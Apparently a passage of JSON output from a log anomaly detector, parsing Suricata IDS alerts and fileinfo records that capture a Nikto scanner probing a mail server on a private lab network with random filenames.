"AnalysisComponentName": "Suricata err message", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_err", "AffectedLogAtomPaths": [ "/parser/model/message", "/parser/model/classification", "/parser/model/priority" ], "AffectedLogAtomValues": [ "SURICATA HTTP METHOD terminated by non-compliant character", "Generic Protocol Command Decode", 3 ], "ParsedLogAtom": { "/parser/model": "03/04/2020-19:18:34.166464 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46780 -> 192.168.10.154:80", "/parser/model/time": 1583349514.166464, "/parser/model/brack_str1": "] {", "/parser/model/id1": 1, "/parser/model/sep1": ":", "/parser/model/id2": 2221030, "/parser/model/sep2": ":", "/parser/model/id3": 1, "/parser/model/sep3": "] ", "/parser/model/message": "SURICATA HTTP METHOD terminated by non-compliant character", "/parser/model/classficiation_str": " [**] [Classification: ", "/parser/model/classification": "Generic Protocol Command Decode", "/parser/model/priority_str": "] [Priority: ", "/parser/model/priority": 3, "/parser/model/conn": "TCP", "/parser/model/brack_str2": "} ", "/parser/model/src_ip": 3232238318, "/parser/model/colon": ":", "/parser/model/src_port": 46780, "/parser/model/arrow_str": " -> ", "/parser/model/dst_ip": 3232238234, "/parser/model/dst_port": 80 } }, "LogData": { "RawLogData": [ "03/04/2020-19:18:34.166464 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46780 -> 192.168.10.154:80" ], "Timestamps": [ 1583349514.17 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 11, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata fileinfo", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_fileinfo", "AffectedLogAtomPaths": [ "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename", "/parser/model/event_type/fileinfo/fileinfo/state", "/parser/model/event_type/fileinfo/fileinfo/stored" ], "AffectedLogAtomValues": [ "\\/bISn4adA.iso8859-8", "CLOSED", 1 ], "ParsedLogAtom": { "/parser/model": "{\"timestamp\":\"2020-03-04T19:18:34.166606+0000\",\"flow_id\":392624419276641,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46780,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.iso8859-8\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.iso8859-8\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/time_str": "{\"timestamp\":\"", "/parser/model/time": 1583349514.166606, "/parser/model/plus_sign": "+", "/parser/model/tz": 0, "/parser/model/comma_str": "\",", "/parser/model/flow_id": "\"flow_id\":392624419276641,", "/parser/model/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/event_type_str": "\"event_type\":\"", "/parser/model/event_type/fileinfo": "fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46780,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.iso8859-8\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.iso8859-8\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo_str": "fileinfo\",", "/parser/model/event_type/fileinfo/conn": "\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46780,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/http": ",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.iso8859-8\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226}", "/parser/model/event_type/fileinfo/app_proto_str": ",\"app_proto\":\"", "/parser/model/event_type/fileinfo/app_proto": "http", "/parser/model/event_type/fileinfo/fileinfo": "\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.iso8859-8\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo/fileinfo_str": "\",\"fileinfo\":{", "/parser/model/event_type/fileinfo/fileinfo/filename": "\"filename\":\"\\/bISn4adA.iso8859-8\",", "/parser/model/event_type/fileinfo/fileinfo/state_str": "\"state\":\"", "/parser/model/event_type/fileinfo/fileinfo/state": "CLOSED", "/parser/model/event_type/fileinfo/fileinfo/stored_str": "\",\"stored\":", "/parser/model/event_type/fileinfo/fileinfo/stored": 1, "/parser/model/event_type/fileinfo/fileinfo/size_str": ",\"size\":", "/parser/model/event_type/fileinfo/fileinfo/size": 226, "/parser/model/event_type/fileinfo/fileinfo/tx_id_str": ",\"tx_id\":", "/parser/model/event_type/fileinfo/fileinfo/tx_id": 0, "/parser/model/event_type/fileinfo/fileinfo/brack_str": "}}", "/parser/model/event_type/fileinfo/fileinfo/filename/filename": "\"filename\":\"\\/bISn4adA.iso8859-8\",", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename_str": "\"filename\":\"", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename": "\\/bISn4adA.iso8859-8", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/quote_str": "\",", "/parser/model/event_type/fileinfo/http/hostname_str": ",\"http\":{\"hostname\":\"", "/parser/model/event_type/fileinfo/http/hostname": "mail.cup.com", "/parser/model/event_type/fileinfo/http/url_str": "\",\"url\":\"", "/parser/model/event_type/fileinfo/http/url": "\\/bISn4adA.iso8859-8", "/parser/model/event_type/fileinfo/http/http_user_agent_str": "\",\"http_user_agent\":\"", "/parser/model/event_type/fileinfo/http/http_user_agent": "Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)", "/parser/model/event_type/fileinfo/http/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/http_refer": null, "/parser/model/event_type/fileinfo/http/http_method_str": "\",\"http_method\":\"", "/parser/model/event_type/fileinfo/http/http_method": "GET", "/parser/model/event_type/fileinfo/http/protocol_str": "\",\"protocol\":\"", "/parser/model/event_type/fileinfo/http/protocol": "HTTP\\/1.1", "/parser/model/event_type/fileinfo/http/quote_str": "\"", "/parser/model/event_type/fileinfo/http/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/redirect": null, "/parser/model/event_type/fileinfo/http/length_str": ",\"length\":", "/parser/model/event_type/fileinfo/http/length": 226, "/parser/model/event_type/fileinfo/http/brack_str": "}", "/parser/model/event_type/fileinfo/http/status/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/status/status/status_str": ",\"status\":", "/parser/model/event_type/fileinfo/http/status/status/status": 400, "/parser/model/event_type/fileinfo/http/content_type/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type_str": "\",\"http_content_type\":\"", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type": "text\\/html", "/parser/model/event_type/fileinfo/conn/src_ip_str": "\"src_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4": "192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46780,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_ip": 3232238234, "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port_str": "\",\"src_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port": 80, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip_str": ",\"dest_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip": 3232238318, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port_str": "\",\"dest_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port": 46780, "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto_str": ",\"proto\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto": "TCP", "/parser/model/event_type/fileinfo/conn/ip/ipv4/quote": "\"", "/parser/model/in_iface/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/in_iface/in_iface/in_iface_str": "\"in_iface\":\"", "/parser/model/in_iface/in_iface/in_iface": "eth0", "/parser/model/in_iface/in_iface/comma_str": "\",", "/parser/model/flow_id/flow_id": "\"flow_id\":392624419276641,", "/parser/model/flow_id/flow_id/flow_id_str": "\"flow_id\":", "/parser/model/flow_id/flow_id/flow_id": 392624419276641, "/parser/model/flow_id/flow_id/comma_str": "," } }, "LogData": { "RawLogData": [ "{\"timestamp\":\"2020-03-04T19:18:34.166606+0000\",\"flow_id\":392624419276641,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46780,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.iso8859-8\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.iso8859-8\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}" ], "Timestamps": [ 1583349514.17 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 9, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata err message", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_err", "AffectedLogAtomPaths": [ "/parser/model/message", "/parser/model/classification", "/parser/model/priority" ], "AffectedLogAtomValues": [ "SURICATA HTTP METHOD terminated by non-compliant character", "Generic Protocol Command Decode", 3 ], "ParsedLogAtom": { "/parser/model": "03/04/2020-19:18:34.168173 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46782 -> 192.168.10.154:80", "/parser/model/time": 1583349514.168173, "/parser/model/brack_str1": "] {", "/parser/model/id1": 1, "/parser/model/sep1": ":", "/parser/model/id2": 2221030, "/parser/model/sep2": ":", "/parser/model/id3": 1, "/parser/model/sep3": "] ", "/parser/model/message": "SURICATA HTTP METHOD terminated by non-compliant character", "/parser/model/classficiation_str": " [**] [Classification: ", "/parser/model/classification": "Generic Protocol Command Decode", "/parser/model/priority_str": "] [Priority: ", "/parser/model/priority": 3, "/parser/model/conn": "TCP", "/parser/model/brack_str2": "} ", "/parser/model/src_ip": 3232238318, "/parser/model/colon": ":", "/parser/model/src_port": 46782, "/parser/model/arrow_str": " -> ", "/parser/model/dst_ip": 3232238234, "/parser/model/dst_port": 80 } }, "LogData": { "RawLogData": [ "03/04/2020-19:18:34.168173 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46782 -> 192.168.10.154:80" ], "Timestamps": [ 1583349514.17 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 11, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata fileinfo", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_fileinfo", "AffectedLogAtomPaths": [ "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename", "/parser/model/event_type/fileinfo/fileinfo/state", "/parser/model/event_type/fileinfo/fileinfo/stored" ], "AffectedLogAtomValues": [ "\\/bISn4adA.types", "CLOSED", 1 ], "ParsedLogAtom": { "/parser/model": "{\"timestamp\":\"2020-03-04T19:18:34.168368+0000\",\"flow_id\":941400980622918,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46782,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.types\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.types\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/time_str": "{\"timestamp\":\"", "/parser/model/time": 1583349514.168368, "/parser/model/plus_sign": "+", "/parser/model/tz": 0, "/parser/model/comma_str": "\",", "/parser/model/flow_id": "\"flow_id\":941400980622918,", "/parser/model/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/event_type_str": "\"event_type\":\"", "/parser/model/event_type/fileinfo": "fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46782,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.types\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.types\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo_str": "fileinfo\",", "/parser/model/event_type/fileinfo/conn": "\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46782,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/http": ",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.types\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226}", "/parser/model/event_type/fileinfo/app_proto_str": ",\"app_proto\":\"", "/parser/model/event_type/fileinfo/app_proto": "http", "/parser/model/event_type/fileinfo/fileinfo": "\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.types\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo/fileinfo_str": "\",\"fileinfo\":{", "/parser/model/event_type/fileinfo/fileinfo/filename": "\"filename\":\"\\/bISn4adA.types\",", "/parser/model/event_type/fileinfo/fileinfo/state_str": "\"state\":\"", "/parser/model/event_type/fileinfo/fileinfo/state": "CLOSED", "/parser/model/event_type/fileinfo/fileinfo/stored_str": "\",\"stored\":", "/parser/model/event_type/fileinfo/fileinfo/stored": 1, "/parser/model/event_type/fileinfo/fileinfo/size_str": ",\"size\":", "/parser/model/event_type/fileinfo/fileinfo/size": 226, "/parser/model/event_type/fileinfo/fileinfo/tx_id_str": ",\"tx_id\":", "/parser/model/event_type/fileinfo/fileinfo/tx_id": 0, "/parser/model/event_type/fileinfo/fileinfo/brack_str": "}}", "/parser/model/event_type/fileinfo/fileinfo/filename/filename": "\"filename\":\"\\/bISn4adA.types\",", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename_str": "\"filename\":\"", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename": "\\/bISn4adA.types", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/quote_str": "\",", "/parser/model/event_type/fileinfo/http/hostname_str": ",\"http\":{\"hostname\":\"", "/parser/model/event_type/fileinfo/http/hostname": "mail.cup.com", "/parser/model/event_type/fileinfo/http/url_str": "\",\"url\":\"", "/parser/model/event_type/fileinfo/http/url": "\\/bISn4adA.types", "/parser/model/event_type/fileinfo/http/http_user_agent_str": "\",\"http_user_agent\":\"", "/parser/model/event_type/fileinfo/http/http_user_agent": "Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)", "/parser/model/event_type/fileinfo/http/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/http_refer": null, "/parser/model/event_type/fileinfo/http/http_method_str": "\",\"http_method\":\"", "/parser/model/event_type/fileinfo/http/http_method": "GET", "/parser/model/event_type/fileinfo/http/protocol_str": "\",\"protocol\":\"", "/parser/model/event_type/fileinfo/http/protocol": "HTTP\\/1.1", "/parser/model/event_type/fileinfo/http/quote_str": "\"", "/parser/model/event_type/fileinfo/http/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/redirect": null, "/parser/model/event_type/fileinfo/http/length_str": ",\"length\":", "/parser/model/event_type/fileinfo/http/length": 226, "/parser/model/event_type/fileinfo/http/brack_str": "}", "/parser/model/event_type/fileinfo/http/status/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/status/status/status_str": ",\"status\":", "/parser/model/event_type/fileinfo/http/status/status/status": 400, "/parser/model/event_type/fileinfo/http/content_type/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type_str": "\",\"http_content_type\":\"", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type": "text\\/html", "/parser/model/event_type/fileinfo/conn/src_ip_str": "\"src_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4": "192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46782,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_ip": 3232238234, "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port_str": "\",\"src_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port": 80, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip_str": ",\"dest_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip": 3232238318, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port_str": "\",\"dest_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port": 46782, "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto_str": ",\"proto\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto": "TCP", "/parser/model/event_type/fileinfo/conn/ip/ipv4/quote": "\"", "/parser/model/in_iface/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/in_iface/in_iface/in_iface_str": "\"in_iface\":\"", "/parser/model/in_iface/in_iface/in_iface": "eth0", "/parser/model/in_iface/in_iface/comma_str": "\",", "/parser/model/flow_id/flow_id": "\"flow_id\":941400980622918,", "/parser/model/flow_id/flow_id/flow_id_str": "\"flow_id\":", "/parser/model/flow_id/flow_id/flow_id": 941400980622918, "/parser/model/flow_id/flow_id/comma_str": "," } }, "LogData": { "RawLogData": [ "{\"timestamp\":\"2020-03-04T19:18:34.168368+0000\",\"flow_id\":941400980622918,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46782,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.types\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.types\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}" ], "Timestamps": [ 1583349514.17 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 9, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata err message", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_err", "AffectedLogAtomPaths": [ "/parser/model/message", "/parser/model/classification", "/parser/model/priority" ], "AffectedLogAtomValues": [ "SURICATA HTTP METHOD terminated by non-compliant character", "Generic Protocol Command Decode", 3 ], "ParsedLogAtom": { "/parser/model": "03/04/2020-19:18:34.169890 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46784 -> 192.168.10.154:80", "/parser/model/time": 1583349514.16989, "/parser/model/brack_str1": "] {", "/parser/model/id1": 1, "/parser/model/sep1": ":", "/parser/model/id2": 2221030, "/parser/model/sep2": ":", "/parser/model/id3": 1, "/parser/model/sep3": "] ", "/parser/model/message": "SURICATA HTTP METHOD terminated by non-compliant character", "/parser/model/classficiation_str": " [**] [Classification: ", "/parser/model/classification": "Generic Protocol Command Decode", "/parser/model/priority_str": "] [Priority: ", "/parser/model/priority": 3, "/parser/model/conn": "TCP", "/parser/model/brack_str2": "} ", "/parser/model/src_ip": 3232238318, "/parser/model/colon": ":", "/parser/model/src_port": 46784, "/parser/model/arrow_str": " -> ", "/parser/model/dst_ip": 3232238234, "/parser/model/dst_port": 80 } }, "LogData": { "RawLogData": [ "03/04/2020-19:18:34.169890 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46784 -> 192.168.10.154:80" ], "Timestamps": [ 1583349514.17 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 11, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata fileinfo", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_fileinfo", "AffectedLogAtomPaths": [ "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename", "/parser/model/event_type/fileinfo/fileinfo/state", "/parser/model/event_type/fileinfo/fileinfo/stored" ], "AffectedLogAtomValues": [ "\\/bISn4adA.stat", "CLOSED", 1 ], "ParsedLogAtom": { "/parser/model": "{\"timestamp\":\"2020-03-04T19:18:34.170041+0000\",\"flow_id\":1023417676108868,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46784,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.stat\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.stat\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/time_str": "{\"timestamp\":\"", "/parser/model/time": 1583349514.170041, "/parser/model/plus_sign": "+", "/parser/model/tz": 0, "/parser/model/comma_str": "\",", "/parser/model/flow_id": "\"flow_id\":1023417676108868,", "/parser/model/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/event_type_str": "\"event_type\":\"", "/parser/model/event_type/fileinfo": "fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46784,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.stat\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.stat\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo_str": "fileinfo\",", "/parser/model/event_type/fileinfo/conn": "\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46784,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/http": ",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.stat\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226}", "/parser/model/event_type/fileinfo/app_proto_str": ",\"app_proto\":\"", "/parser/model/event_type/fileinfo/app_proto": "http", "/parser/model/event_type/fileinfo/fileinfo": "\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.stat\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo/fileinfo_str": "\",\"fileinfo\":{", "/parser/model/event_type/fileinfo/fileinfo/filename": "\"filename\":\"\\/bISn4adA.stat\",", "/parser/model/event_type/fileinfo/fileinfo/state_str": "\"state\":\"", "/parser/model/event_type/fileinfo/fileinfo/state": "CLOSED", "/parser/model/event_type/fileinfo/fileinfo/stored_str": "\",\"stored\":", "/parser/model/event_type/fileinfo/fileinfo/stored": 1, "/parser/model/event_type/fileinfo/fileinfo/size_str": ",\"size\":", "/parser/model/event_type/fileinfo/fileinfo/size": 226, "/parser/model/event_type/fileinfo/fileinfo/tx_id_str": ",\"tx_id\":", "/parser/model/event_type/fileinfo/fileinfo/tx_id": 0, "/parser/model/event_type/fileinfo/fileinfo/brack_str": "}}", "/parser/model/event_type/fileinfo/fileinfo/filename/filename": "\"filename\":\"\\/bISn4adA.stat\",", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename_str": "\"filename\":\"", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename": "\\/bISn4adA.stat", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/quote_str": "\",", "/parser/model/event_type/fileinfo/http/hostname_str": ",\"http\":{\"hostname\":\"", "/parser/model/event_type/fileinfo/http/hostname": "mail.cup.com", "/parser/model/event_type/fileinfo/http/url_str": "\",\"url\":\"", "/parser/model/event_type/fileinfo/http/url": "\\/bISn4adA.stat", "/parser/model/event_type/fileinfo/http/http_user_agent_str": "\",\"http_user_agent\":\"", "/parser/model/event_type/fileinfo/http/http_user_agent": "Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)", "/parser/model/event_type/fileinfo/http/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/http_refer": null, "/parser/model/event_type/fileinfo/http/http_method_str": "\",\"http_method\":\"", "/parser/model/event_type/fileinfo/http/http_method": "GET", "/parser/model/event_type/fileinfo/http/protocol_str": "\",\"protocol\":\"", "/parser/model/event_type/fileinfo/http/protocol": "HTTP\\/1.1", "/parser/model/event_type/fileinfo/http/quote_str": "\"", "/parser/model/event_type/fileinfo/http/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/redirect": null, "/parser/model/event_type/fileinfo/http/length_str": ",\"length\":", "/parser/model/event_type/fileinfo/http/length": 226, "/parser/model/event_type/fileinfo/http/brack_str": "}", "/parser/model/event_type/fileinfo/http/status/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/status/status/status_str": ",\"status\":", "/parser/model/event_type/fileinfo/http/status/status/status": 400, "/parser/model/event_type/fileinfo/http/content_type/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type_str": "\",\"http_content_type\":\"", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type": "text\\/html", "/parser/model/event_type/fileinfo/conn/src_ip_str": "\"src_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4": "192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46784,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_ip": 3232238234, "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port_str": "\",\"src_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port": 80, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip_str": ",\"dest_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip": 3232238318, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port_str": "\",\"dest_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port": 46784, "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto_str": ",\"proto\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto": "TCP", "/parser/model/event_type/fileinfo/conn/ip/ipv4/quote": "\"", "/parser/model/in_iface/in_iface": 